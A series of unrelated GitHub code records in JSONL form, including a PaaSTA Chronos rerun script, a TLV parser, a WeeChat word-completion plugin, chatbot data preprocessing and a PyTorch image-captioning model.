to be identified as a temporary job.\n \"\"\"\n current_name = chronos_job['name']\n\n chronos_job['name'] = '{}{}{}'.format(\n get_tmp_naming_scheme_prefix(timestamp),\n chronos_tools.SPACER,\n current_name,\n )\n\n return chronos_job\n\n\ndef remove_parents(chronos_job):\n \"\"\"\n Given a chronos job, return a new job identical to the first, but with the\n parents field removed\n\n :param chronos_job: a chronos_job suitable for POSTing to Chronos\n :returns: the chronos_job parameter, with the parents field of the job\n removed.\n \"\"\"\n chronos_job.pop('parents', None)\n return chronos_job\n\n\ndef clone_job(chronos_job, timestamp=None, force_disabled=False):\n \"\"\"\n Given a chronos job, create a 'rerun' clone that respects the parents relations.\n If the job has his own schedule it will be executed once and only once, and as soon as possible.\n\n :param chronos_job: a chronos job suitable for POSTing to Chronos\n :param timestamp: timestamp to use for the generation of the tmp job name\n :returns: the chronos_job parameter, modified to be submitted as a\n temporary clone used to rerun a job in the context of a given date.\n \"\"\"\n clone = copy.deepcopy(chronos_job)\n job_type = 
chronos_tools.get_job_type(clone)\n\n # modify the name of the job\n clone = set_tmp_naming_scheme(clone, timestamp)\n\n # If the jobs is a dependent job rename the parents dependencies\n # in order to make this job dependent from the temporary clone of the parents\n if job_type == chronos_tools.JobType.Dependent:\n clone['parents'] = [\n '{}{}{}'.format(\n get_tmp_naming_scheme_prefix(timestamp),\n chronos_tools.SPACER,\n parent,\n )\n for parent in chronos_job['parents']\n ]\n else:\n # If the job is a scheduled one update the schedule to start it NOW\n clone = set_default_schedule(clone)\n\n # Set disabled to false if force_disabled is on\n if force_disabled:\n clone['disabled'] = False\n\n return clone\n\n\ndef main():\n args = parse_args()\n\n system_paasta_config = load_system_paasta_config()\n cluster = system_paasta_config.get_cluster()\n\n service, instance = chronos_tools.decompose_job_id(args.service_instance)\n\n config = chronos_tools.load_chronos_config()\n client = chronos_tools.get_chronos_client(config)\n\n related_jobs = chronos_tools.get_related_jobs_configs(cluster, service, instance, soa_dir=args.soa_dir)\n if not related_jobs:\n error_msg = \"No deployment found for {} in cluster {}. Has Jenkins run for it?\".format(\n args.service_instance, cluster,\n )\n paasta_print(error_msg)\n raise NoDeploymentsAvailable\n\n if not args.run_all_related_jobs:\n # Strip all the configuration for the related services\n # those information will not be used by the rest of the flow\n related_jobs = {\n (service, instance): related_jobs[(service, instance)],\n }\n\n complete_job_configs = {}\n for (srv, inst) in related_jobs:\n try:\n complete_job_configs.update(\n {\n (srv, inst): chronos_tools.create_complete_config(\n service=srv,\n job_name=inst,\n soa_dir=args.soa_dir,\n ),\n },\n )\n except (NoDeploymentsAvailable, NoDockerImageError) as e:\n error_msg = \"No deployment found for {} in cluster {}. 
Has Jenkins run for it?\".format(\n chronos_tools.compose_job_id(srv, inst), cluster,\n )\n paasta_print(error_msg)\n raise e\n except NoConfigurationForServiceError as e:\n error_msg = (\n \"Could not read chronos configuration file for {} in cluster {}\\nError was: {}\".format(\n chronos_tools.compose_job_id(srv, inst), cluster, str(e),\n )\n )\n paasta_print(error_msg)\n raise e\n except chronos_tools.InvalidParentError as e:\n raise e\n\n if not args.run_all_related_jobs:\n sorted_jobs = [(service, instance)]\n else:\n sorted_jobs = chronos_tools.topological_sort_related_jobs(cluster, service, instance, soa_dir=args.soa_dir)\n\n timestamp = datetime.datetime.utcnow().isoformat()\n\n chronos_to_add = []\n for (service, instance) in sorted_jobs:\n # complete_job_config is a formatted version of the job,\n # so the command is formatted in the context of 'now'\n # replace it with the 'original' cmd so it can be re rendered\n chronos_job_config = chronos_tools.load_chronos_job_config(\n service=service,\n instance=instance,\n cluster=cluster,\n soa_dir=args.soa_dir,\n )\n original_command = chronos_job_config.get_cmd()\n complete_job_config = complete_job_configs[(service, instance)]\n complete_job_config['command'] = original_command\n clone = clone_job(\n chronos_job=complete_job_config,\n timestamp=timestamp,\n force_disabled=args.force_disabled,\n )\n # modify the command to run commands for a given date\n clone = modify_command_for_date(\n chronos_job=clone,\n date=datetime.datetime.strptime(args.execution_date, \"%Y-%m-%dT%H:%M:%S\"),\n verbose=args.verbose,\n )\n\n if not args.run_all_related_jobs and chronos_tools.get_job_type(clone) == chronos_tools.JobType.Dependent:\n # If the job is a dependent job and we want to re-run only the specific instance\n # remove the parents and update the schedule to start the job as soon as possible\n clone = set_default_schedule(remove_parents(clone))\n\n chronos_to_add.append(clone)\n\n for job_to_add in chronos_to_add:\n client.add(job_to_add)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"eric-erki/An-open-distributed-platform-as-a-service","sub_path":"paasta_tools/chronos_rerun.py","file_name":"chronos_rerun.py","file_ext":"py","file_size_in_byte":9890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14256452935","text":"\"\"\"\nCelery configuration\n\"\"\"\nimport os\n\nfrom celery import Celery\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"odl_video.settings\")\n\nfrom django.conf import ( # pylint: disable=wrong-import-order,wrong-import-position\n settings,\n)\n\napp = Celery(\"odl_video\")\n\n# Using a string here means the worker don't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\napp.config_from_object(\"django.conf:settings\", namespace=\"CELERY\")\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS) # pragma: no cover\n\n\n@app.task(bind=True)\ndef debug_task(self):\n \"\"\"\n Task for debugging purposes\n \"\"\"\n print(\"Request: {0!r}\".format(self.request))\n","repo_name":"mitodl/odl-video-service","sub_path":"odl_video/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"72998550614","text":"# %%\nimport pandas as pd\nimport 
numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nimport math\nfrom text import *\nimport os\nfrom tharnal import *\nimport random\nimport scipy\n\nmc = \"black\"\nplt.rcParams.update(\n {\n \"font.size\": 40,\n \"axes.labelcolor\": \"{}\".format(mc),\n \"xtick.color\": \"{}\".format(mc),\n \"ytick.color\": \"{}\".format(mc),\n \"font.family\": \"sans-serif\",\n }\n)\n# %% Set up paths and variables for plot and analysis\npath_data = \"../../data/participants_mol/\"\npath_figures = \"../../figures/\"\n# list folders in path\nfolders = os.listdir(path_data)\n# remove hidden files\nparticipant_folders = [f for f in folders if not f.startswith(\".\")]\n\nlwD = 7\nwidthtick = 5\nlenD = 20\ns_bub = 350\nultraviolet = \"#654EA3\"\nmystililac = \"#BCB4C4\"\ndriedmoss = \"#CDBC7E\"\n\npattern = f\"mol_.*\\.hdf5$\"\n\npatternc = re.compile(pattern)\n\nall_deltas = []\nall_baselines = []\nslopes = []\ncoeffs = []\np_values = []\nall_thresholds = []\nlist_lists_deltas = []\ndiscarded_trials = {}\n\n# %%\nfor folder_name in participant_folders:\n names = []\n print(folder_name)\n for filename in os.listdir(f\"{path_data}/{folder_name}/\"):\n\n if patternc.match(filename):\n name, form = filename.split(\".\")\n names.append(name)\n else:\n # print(filename)\n continue\n\n names.sort(key=natural_keys)\n\n delta_list = []\n baseline_list = []\n threshold_list = []\n n_discarded_trials = 0\n\n for i, name in enumerate(names):\n print(name)\n dat_im = ReAnRaw(f\"{path_data}/{folder_name}/{name}\")\n dat_im.datatoDic()\n dat_im.extractMeans()\n\n dat_im.extractOpenClose(\"stimulus\")\n if len(dat_im.open) > 0:\n baseline = np.mean(dat_im.means[: (dat_im.open[0] + 1)])\n # print(baseline)\n\n dat_im.extractMeans(name_coor=\"diff_coor\")\n diff_means = dat_im.means\n threshold = dat_im.means[-1]\n\n delta_indv = baseline - threshold\n\n if delta_indv > 0.2:\n delta_list.append(delta_indv)\n baseline_list.append(baseline)\n threshold_list.append(threshold)\n\n else:\n n_discarded_trials += 1\n print(\"DELTA BELOW\")\n else:\n n_discarded_trials += 1\n print(\"Shutter didn't open\")\n\n list_lists_deltas.append(delta_list)\n threshold_subj = np.mean(threshold_list)\n delta_subj = np.mean(delta_list)\n baseline_subj = np.mean(baseline_list)\n discarded_trials[folder_name] = n_discarded_trials\n\n all_deltas.append(delta_subj)\n all_baselines.append(baseline_subj)\n all_thresholds.append(threshold_subj)\n\n# %%\n# ALL DELTAS\ndelta_popu = np.mean(all_deltas)\nfig, ax = plt.subplots(1, 1, figsize=(7, 10))\n\nlwD = 7\nwidthtick = 5\nlenD = 20\ns_bub = 350\n\nfor dd in all_deltas:\n x_pos = random.uniform(0.95, 1.05)\n # print(x_pos)\n ax.scatter(x_pos, -dd, s=s_bub, color=ultraviolet)\n\nax.plot([0.95, 1.05], [-delta_popu, -delta_popu], linewidth=lwD, color=driedmoss)\n\nax.set_xlim(0.85, 1.15)\nax.set_ylim(-2, 0)\n\nax.set_ylabel(\"Relative cold threshold\\n\\n(ΔT $^\\circ$C)\", linespacing=0.6)\n# ax.set_xlabel('Trial number')\n\n# ax.axhline(delta_subj, 0, 1, linewidth=lwD, color=ultraviolet)\nplt.tick_params(bottom=False, labelbottom=False)\n\n# ax.axhline(0, 0, 8, linewidth=20, color='k', linestyle=':')\n\nax.yaxis.set_tick_params(width=lwD, length=lenD, color='grey')\nax.xaxis.set_tick_params(width=lwD, length=lenD, color='grey')\n\nfor spine in ax.spines.values():\n spine.set_edgecolor('grey')\n\nax.spines[\"left\"].set_linewidth(lwD)\nax.spines[\"bottom\"].set_linewidth(lwD)\n\nax.tick_params(axis=\"y\", which=\"major\", pad=10)\nax.tick_params(axis=\"x\", which=\"major\", 
pad=10)\n\nax.set_yticks([-2, -1.5, -1, -0.5, 0])\n\nax.spines[\"top\"].set_visible(False)\nax.spines[\"right\"].set_visible(False)\n\nplt.tight_layout()\nplt.savefig(f\"{path_figures}/figure1/panelF_deltas.png\", transparent=True)","repo_name":"iezqrom/publication-cold-sensation-without-touch","sub_path":"code/analysis-plotting/figure1F_deltas.py","file_name":"figure1F_deltas.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13131933470","text":"#!/usr/bin/python3\nimport io\nimport sys\n\nfrom typing import Any, Iterable\nfrom bertlv import config\nfrom bertlv.parser import (\n BinaryParser,\n InsufficientDataError,\n ParserError,\n TreeBuilder,\n XmlParser,\n parse,\n parse_bytes,\n)\nfrom bertlv.tag import Tag\nfrom bertlv.tree import TlvNode\n\ndef _TlvNode2Dict(tlvNode, dictData):\n children = tlvNode.children\n containerData = {}\n if len(children) == 0 :\n dictData[\"type\"] = \"leaf\"\n dictData[\"tag\"]= tlvNode.name\n dictData[\"value\"]= tlvNode.value.hex()\n else:\n for i in children:\n containerData = {}\n _TlvNode2Dict(i, containerData)\n \n if len(children) != 0 :\n dictData[tlvNode.name] = containerData\n dictData[\"type\"] = \"parent\"\n\ndef TlvNode2Dict(tlvTree):\n dictData = {}\n if tlvTree.is_root == True and len(tlvTree.children) >0 :\n _TlvNode2Dict(tlvTree, dictData)\n return dictData;\n\ndef printTlv2Json():\n byteString = sys.argv[1]\n if len(byteString) <=0:\n exit (2)\n bytes.fromhex(byteString)\n fp = io.BytesIO(bytes.fromhex(byteString))\n treedata = parse(fp, BinaryParser())\n dictData = TlvNode2Dict(treedata)\n print(dictData)\n \ndef printtree():\n byteString = sys.argv[2]\n if len(byteString) <=0:\n exit (2)\n bytes.fromhex(byteString)\n fp = io.BytesIO(bytes.fromhex(byteString))\n treedata = parse(fp, BinaryParser())\n print(treedata.dump())\n\nif len(sys.argv) > 3:\n exit(1)\nif len(sys.argv) == 3:\n printtree()\nelif len(sys.argv) == 2:\n printTlv2Json()\nelse:\n exit(3)","repo_name":"vivekkushwaha39/NppPacketParser","sub_path":"src/python/tlv2json.py","file_name":"tlv2json.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2769883856","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('data_load', '0004_rmsinciden'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='RMSInciden',\n new_name='RMSIncident',\n ),\n ]\n","repo_name":"codeforamerica/vallejo-css-toolkit","sub_path":"data_load/migrations/0005_auto_20151119_1344.py","file_name":"0005_auto_20151119_1344.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"11017886611","text":"from labm8.py import test\nfrom tools.format.formatters import go\n\nFLAGS = test.FLAGS\n\n\ndef test_small_go_program():\n \"\"\"Test pre-processing a small C++ program.\"\"\"\n text = go.FormatGo.Format(\n \"\"\"\npackage main\nimport \"fmt\"\nfunc main() {\n fmt.Println(\"hello world\")\n}\"\"\"\n )\n assert (\n text\n == \"\"\"\\\npackage main\n\nimport \"fmt\"\n\nfunc main() {\n\\tfmt.Println(\"hello world\")\n}\n\"\"\"\n )\n\n\ndef test_empty_file():\n with test.Raises(go.FormatGo.FormatError):\n go.FormatGo.Format(\"\")\n\n\nif __name__ == \"__main__\":\n 
test.Main()\n","repo_name":"ChrisCummins/phd","sub_path":"tools/format/formatters/tests/go_test.py","file_name":"go_test.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"3473426460","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.optimize as scop\n\ndef mapFeature(x1, x2):\n degree = 2\n m = len(x1)\n\n x = np.ones([m, 1]) \n for i in range(1, degree + 1):\n for j in range(i + 1):\n x = np.c_[x, (x1 ** (i - j)) * (x2 ** j)]\n\n return x\n\ndef sigmoid(x):\n g = 1. / (1 + np.e ** (-1 * x))\n return g\n\ndef costFunction(theta, x, y, Lambda):\n h = sigmoid(x.dot(theta))\n m = len(y)\n theta_temp = theta.copy()\n theta_temp[0] = 0\n J = 1. / m * -1 * (np.transpose(y).dot(h) + np.transpose(1 - y).dot(1 - h)) + Lambda / (2 * m) * np.transpose(theta_temp).dot(theta_temp)\n return J\n\ndef gradient(theta, x, y, Lambda):\n h = sigmoid(x.dot(theta))\n m = len(y)\n theta_temp = theta.copy()\n theta_temp[0] = 0\n\n g = 1. / m * np.transpose(x).dot(h - y) + Lambda / m * theta_temp\n return g\n\nif __name__ == \"__main__\":\n data = np.loadtxt(fname = \"ex2data2.txt\", delimiter = \",\")\n x = data[:, 0:2]\n y = data[:, 2]\n\n pos = np.where(y == 1)\n neg = np.where(y == 0)\n plot1 = plt.scatter(x[pos, 0], x[pos, 1], marker = \"o\", c = \"b\")\n plot2 = plt.scatter(x[neg, 0], x[neg, 1], marker = \"x\", c = \"r\")\n\n plt.legend([plot1, plot2], [\"Admitted\", \"No Admitted\"], loc = \"upper right\")\n\n x = mapFeature(x[:, 0], x[:, 1])\n\n m,n = x.shape\n initial_theta = np.zeros([n , 1])\n\n initial_lambda = 0.1\n print(x.shape, y.shape, initial_theta.shape)\n result = scop.fmin_bfgs(f = costFunction, x0 = initial_theta, fprime = gradient, args = (x, y, initial_lambda))\n print(result)\n\n x = np.linspace(-1, 1.5, 50)\n y = np.linspace(-1, 1.5, 50)\n z = np.zeros([len(x), len(y)])\n\n for i in range(len(x)):\n for j in range(len(y)):\n z[i][j] = mapFeature(np.reshape(x[i], [-1, 1]), np.reshape(y[j], [-1, 1])).dot(result)\n\n z = z.T\n\n plt.contour(x, y, z, [0, 0.1])\n plt.show()\n ","repo_name":"Fitz1003Miao/NGhomework","sub_path":"ex2/ex2_reg.py","file_name":"ex2_reg.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1658569542","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys, os\nimport re\nfrom collections import Counter\nimport logs\nimport codecs\nfrom unidecode import unidecode\n\n\n\ndef stripNonConversation(rawInputPath, rawOutputPath, badWords):\n rawData = open(rawInputPath, 'r')\n processedData = open(rawOutputPath,'w+')\n \n rawData.seek(0)\n\n regex1 = re.compile(\"\\[(.*?)\\]\")\n regex2 = re.compile(\"\\((.*?)\\)\")\n for line in rawData:\n line = re.sub(regex1, '', line) # remove []\n line2 = re.sub(regex2, '', line) # remove ()\n line3 = re.sub(r'[^\\x00-\\x7f]',r'', line2) # keep ascii chars only\n line3 = removeBadWords(line3, badWords) # remove non-conversation lines \n line3 = re.sub('^\\s*\\n$', '', line3)\n if(line3): \n processedData.write(line3)\n \n processedData.close()\n rawData.close() \n\n\ndef spanish_prep(rawInputPath, tmp_asciiPath, badWords):\n\n rawData = codecs.open(rawInputPath, 'r', encoding='utf-8')\n asciiData = open(tmp_asciiPath, 'w+', encoding='ascii')\n\n rawData.seek(0)\n \n for line in rawData:\n line = unidecode(line)\n 
asciiData.write(line)\n \n rawData.close()\n asciiData.close()\n\n\n# private\ndef removeBadWords(line, badWords):\n for i in range(len(badWords)):\n line = re.sub(badWords[i], '', line)\n return line\n\n\n\n# input must be striped for NonConversation\ndef findMostFreqSpeaker(rawProcessedPath):\n\n rawData = open(rawProcessedPath, 'r')\n\n rawData.seek(0)\n names = []\n for line in rawData:\n end = line.find(':')\n if (end != -1):\n x = line[0:end]\n names.append(x)\n\n mostFreqActor = Counter(names).most_common(1)\n mostFreqActor= [name[0] for name in mostFreqActor]\n mostFreqActor = ''.join(mostFreqActor)\n\n rawData.close()\n \n return mostFreqActor\n\n\n\ndef separateData(rawProcessedPath, mostFreqActor, enc_dataPath, dec_dataPath, showID):\n \n rawData = open(rawProcessedPath,'r')\n enc_data = open(enc_dataPath, 'a+')\n dec_data = open(dec_dataPath,'a+')\n \n name = mostFreqActor + ':' # mostFreqActor is name of speaker for decoder\n rawData.seek(0) \n prev = rawData.readline()\n\n sample_num = 0;\n for line in rawData:\n start = line.find(name)\n\n if (start != -1):\n #make sure there is a matching response\n prev_idx = prev.find(\":\")\n if(prev_idx == -1):\n prev = line\n continue\n #if there is a matching response, write to files\n start = start + (len(name))\n target = line[start:] # actual text for decoder\n removeActorNames(target)\n dec_data.write(target)\n\n\n name_speaker = prev[0:prev_idx] # name of speaker for encoder\n speaker = prev[prev_idx+1:] # actual text for encoder\n removeActorNames(speaker)\n enc_data.write(speaker)\n \n # create seperate file to log actor id's\n msg = 'ENC_ACTORID = ' + mostFreqActor + ' DEC_ACTORID = ' + name_speaker + '\\n'\n logs.log(sample_num, msg, showID, 'preprocess')\n sample_num = sample_num + 1\n \n prev = line\n\n\n dec_data.close() \n enc_data.close()\n rawData.close()\n\n\n#private\n# last NonConversation text to be removed\ndef removeActorNames(line):\n end = line.find(':')\n if (end != -1):\n x = line[0:end+1]\n \n regex = \"^(\\s)*\" + re.escape(x) + \"(\\s)*(\\.)?(\\s)*(\\:)?\"\n regex = re.compile(regex)\n re.sub(regex,'',line)\n return line \n","repo_name":"mkperkin/FRIENDS-CHATBOTS","sub_path":"preprocess_helpers.py","file_name":"preprocess_helpers.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4203328370","text":"help_args = \"[reverse]\"\n\nhelp_args_desc=\"\"\"reverse: Reverse the direction of the completion cycle\n\nDescription:\n\nThis script tries to complete the current word by looking at the last lines of\nthe current buffer. It is inspired by Vim's keyword completion. It does not\nbind any keys by default, but it's not useful unless bindings exist. To make it\nsimilar to Vim I suggest bind ctrl-P to \"/complete_word\" and ctrl-N to\n\"/complete_word reverse\"\n\nIf someone (including you) has written 'internationalization' in the current\nbuffer recently you can type 'inter' and the full word will be inserted\nfor you. If someone had written 'internet' in the mean time that will be\ninserted instead since it appeared more recently: repeat the ctrl-P keystroke\nto cycle matches. If you go too far you can press ctrl-N to reverse the\ndirection of the cycle. If there are no matches nothing happens.\n\nAs the matches are inserted directly into the input bar there is no need to\npress a key to \"accept\" the current completion. 
Just continue typing; the\nscript will then regard its job as done.\n\nThe default number of lines to search in is 50. If the script appears to be\nslow you can reduce the number of lines to search for matches by changing the\n\"lines_limit\". Conversely, if it rarely completes the word you want you can\nincrease the number.\n\nIt only considers lines that are messages written by humans (or bots). Set\n\"raw_lines_limit\" to set an absolute limit (default 150).\n\nBy default the script uses the regex \\b\\w+ to find the partial word in the\ninput bar and then finds candidates by searching for the partial word followed\nby \\w+ . This can be customized using the \"word_definition\" and \"word_start\"\nvariables.\n\nFor convenience if the input bar is empty, and hence completion is meaningless,\nthis script performs another command instead. Set these with the \"empty_cmd\"\nand \"empty_cmd_rev\" settings. By default they are set to ctrl-P and ctrl-N's\ndefaults respectively.\"\"\"\n\nimport weechat as w\nimport re\nfrom collections import OrderedDict\n\nSCRIPT_NAME = \"complete_words\"\nSCRIPT_AUTHOR = \"Øystein Walle \"\nSCRIPT_VERSION = \"0.1\"\nSCRIPT_LICENSE = \"GPL\"\nSCRIPT_DESC = \"Complete words from current buffer\"\n\nsettings = {\n \"word_definition\" : r'\\w+', # Regex used to find rest of word\n \"word_start\" : r'\\b\\w+', # Regex used to grab partial word\n \"lines\" : '50', # Number of lines to look in\n \"raw_lines\" : '150', # Number of lines to look in\n \"empty_cmd\" : '/buffer -1', # Command to run if input bar is empty\n \"empty_cmd_rev\" : '/buffer +1', # Command to run if input bar is empty\n}\n\nnew_completion = True\nlast_lines = []\nmatches = []\nindex = 0\npartial = ''\nhooks = ('', '')\n\ndef grab_current_word(buffer):\n left = get_input_line(buffer, -1)\n word_start = w.config_get_plugin(\"word_start\")\n part = re.search(word_start + '$', left, re.UNICODE)\n if part:\n global partial\n partial = part.group(0)\n return partial\n return None\n\ndef insert_word(buffer, word, prev_word):\n input_line = w.buffer_get_string(buffer, 'input')\n input_pos = w.buffer_get_integer(buffer, 'input_pos')\n\n strip_len = len(prev_word)\n left = input_line[0:input_pos - strip_len]\n new_pos = input_pos + len(word) - strip_len\n right = input_line[input_pos:]\n result = left + word + right\n\n # If we don't deactivate the hook temporarily it is triggered\n global hooks\n map(w.unhook, hooks)\n w.buffer_set(buffer, 'input', result)\n w.buffer_set(buffer, 'input_pos', str(new_pos))\n hooks = (w.hook_signal(\"input_text_*\", \"finish_hook\", \"\"),\n w.hook_signal(\"*_switch\", \"finish_hook\", \"\"))\n\ndef find_matches(partial):\n word_definition = w.config_get_plugin(\"word_definition\")\n pat = r'(?<=\\b' + partial + ')' + word_definition\n global matches\n for line in last_lines:\n m = re.findall(pat, line, re.UNICODE)\n m.reverse()\n matches = matches + m\n matches = list(OrderedDict.fromkeys(matches))\n\ndef get_input_line(buffer, right):\n input_line = w.buffer_get_string(buffer, 'input')\n input_pos = w.buffer_get_integer(buffer, 'input_pos')\n if right == 1:\n return input_line[input_pos:]\n elif right == -1: #Left\n return input_line[:input_pos]\n else:\n return input_line\n\ndef fill_last_lines(buffer):\n last_lines.append(get_input_line(buffer, -1))\n hdata = w.hdata_get(\"buffer\")\n lines = w.hdata_pointer(hdata, buffer, \"own_lines\")\n\n found = 0\n processed = 0\n lines_limit = int(w.config_get_plugin(\"lines\"))\n raw_lines_limit = 
int(w.config_get_plugin(\"raw_lines\"))\n line = w.hdata_pointer(w.hdata_get('lines'), lines, \"last_line\")\n\n while found < lines_limit and processed < raw_lines_limit and line != \"\":\n line_data = w.hdata_pointer(w.hdata_get('line'), line, \"data\")\n\n count = w.hdata_integer(w.hdata_get(\"line_data\"), line_data, \"tags_count\")\n if count == 0:\n processed += 1\n continue\n\n tag = w.hdata_string(w.hdata_get('line_data'), line_data, \"0|tags_array\")\n if tag == 'irc_privmsg':\n message = w.hdata_string(w.hdata_get('line_data'), line_data, \"message\")\n last_lines.append(message)\n found += 1\n line = w.hdata_pointer(w.hdata_get('line'), line, \"prev_line\")\n processed += 1\n\n last_lines.append(get_input_line(buffer, 1))\n\ndef input_bar_is_empty(buffer):\n return (get_input_line(buffer, 0) == \"\")\n\ndef run_other_command(backward):\n if backward:\n w.command(\"\", w.config_get_plugin(\"empty_cmd\"))\n else:\n w.command(\"\", w.config_get_plugin(\"empty_cmd_rev\"))\n\n# Called when invoking /complete_word\ndef main_hook(data, buffer, args):\n if args != \"reverse\":\n backward = True\n else:\n backward = False\n\n if input_bar_is_empty(buffer):\n run_other_command(backward)\n return w.WEECHAT_RC_OK\n\n global new_completion\n if new_completion == False:\n continue_completion(buffer, backward)\n else:\n # Set flag\n new_completion = False\n complete_word(buffer, backward)\n w.bar_item_update(\"complete_status\")\n return w.WEECHAT_RC_OK\n\n# Called when the cursor is moved after attempting completion\n# Taken as a signal that the completion is done\ndef finish_hook(signal, type_data, signal_data):\n finish_completion()\n w.bar_item_update(\"complete_status\")\n return w.WEECHAT_RC_OK\n\ndef complete_word(buffer, backward):\n fill_last_lines(buffer)\n partial = grab_current_word(buffer)\n if not partial:\n finish_completion()\n return\n find_matches(partial)\n if len(matches):\n global index\n if backward:\n index = 0\n else:\n index = len(matches) - 1\n insert_word(buffer, matches[index], '')\n else:\n finish_completion()\n\ndef continue_completion(buffer, backward):\n global index\n prev_word = matches[index]\n if backward:\n index = (index + 1) % len(matches)\n else:\n index = (index + len(matches) - 1) % len(matches)\n word = matches[index]\n insert_word(buffer, word, prev_word)\n\n# Cleanup function\ndef finish_completion():\n global new_completion\n new_completion = True\n global last_lines\n last_lines = []\n global matches\n matches = []\n global index\n index = 0\n global hooks\n map(w.unhook, hooks)\n hooks = ('', '')\n global partial\n partial = ''\n\ndef update_bar_item(data, item, window):\n if index == 0 and len(matches) == 0:\n return \"\"\n return 'Completing \\\"' + partial + '\": ' + str(index + 1) + '/' + str(len(matches))\n\nif __name__ == \"__main__\":\n if w.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION, SCRIPT_LICENSE,\n SCRIPT_DESC, \"\", \"\"):\n # Set default settings\n my_bar = w.bar_item_new(\"complete_status\", \"update_bar_item\", \"\")\n for option, default_value in list(settings.items()):\n if not w.config_is_set_plugin(option):\n w.config_set_plugin(option, default_value)\n w.hook_command(\"complete_word\", SCRIPT_DESC, help_args, help_args_desc, \"\", \"main_hook\", \"\")\n # Now we wait\n","repo_name":"Osse/complete_words","sub_path":"complete_words.py","file_name":"complete_words.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} 
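# -- editor note (complete_words.py, above): find_matches() splices the
# partial word straight into a regex. With the default word_start (\b\w+)
# only word characters can reach it, but word_start is user-configurable,
# and a partial containing metacharacters would raise re.error. A hardened
# sketch of the same lookbehind search with ordered de-duplication:
import re

def find_matches(partial, lines, word_definition=r"\w+"):
    """Completions of `partial` seen in `lines`, most recent first."""
    pat = r"(?<=\b" + re.escape(partial) + r")" + word_definition
    seen = {}
    for line in lines:
        for m in reversed(re.findall(pat, line, re.UNICODE)):
            seen.setdefault(m, None)       # dicts preserve insertion order
    return list(seen)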
+{"seq_id":"32835755615","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nclass EncoderCNN(nn.Module):\n def __init__(self, embed_size):\n super(EncoderCNN, self).__init__()\n resnet = models.resnet50(pretrained=True)\n for param in resnet.parameters():\n param.requires_grad_(False)\n \n modules = list(resnet.children())[:-1]\n self.resnet = nn.Sequential(*modules)\n self.embed = nn.Linear(resnet.fc.in_features, embed_size)\n ##Batch Normalisation & initialize weight in dense layer\n self.batch= nn.BatchNorm1d(embed_size,momentum = 0.01)\n self.embed.weight.data.normal_(0., 0.02)\n self.embed.bias.data.fill_(0)\n\n def forward(self, images):\n \"\"\"Extract the image feature vectors.\"\"\"\n features = self.resnet(images)\n features = features.view(features.size(0), -1)\n features = self.batch(self.embed(features))\n \n return features\n \n \nclass DecoderRNN(nn.Module):\n def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):\n \"\"\"Set the hyper-parameters and build the layers.\"\"\"\n super(DecoderRNN, self).__init__()\n \n self.embedding_layer = nn.Embedding(vocab_size, embed_size)\n \n self.lstm = nn.LSTM(input_size = embed_size,hidden_size = hidden_size,\n num_layers = num_layers, batch_first=True)\n \n self.linear = nn.Linear(hidden_size, vocab_size)\n self.dropout = nn.Dropout(0.35)\n self.init_weights()\n \n def init_weights(m):\n \"\"\"Initialize weights.\"\"\"\n if type(m) == nn.Linear:\n I.xavier_uniform_(m.weight)\n m.bias.data.fill_(0.01)\n \n if isinstance(m, nn.Conv2d):\n I.xavier_uniform_(m.weight.data)\n m.bias.data.fill_(0.01) \n \n\n def forward(self, features, captions):\n \"\"\" Decode feature vectors and generate captions \"\"\"\n ###Remove end tag\n captions = captions[:, :-1]\n embed = self.dropout(self.embedding_layer(captions))\n embed = torch.cat((features.unsqueeze(1), embed), dim = 1)\n #packed = pack_padded_sequence(embed, lengths, batch_first=True) \n lstm_outputs, _ = self.lstm(embed)\n out = self.linear(lstm_outputs)\n \n return out\n\n def sample(self, inputs, states=None, max_len=20): \n \" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) \" \n predicted_sentence = []\n \n for i in range(max_len): # max sampling length\n \n # Get output and states from LSTM layer\n lstm_out, states = self.lstm(inputs, states) #(batch_size, 1, hidden_size)\n lstm_out = lstm_out.squeeze(1)\n \n # Get output of the linear layer\n outputs = self.linear(lstm_out)\n \n # Get the best predicted \n predicted = outputs.max(1)[1]\n \n # Append predicted item to predicted sentence\n predicted_sentence.append(predicted.item())\n # Update input for next sequence\n inputs = self.embedding_layer(predicted).unsqueeze(1)\n \n #predicted_sentence = 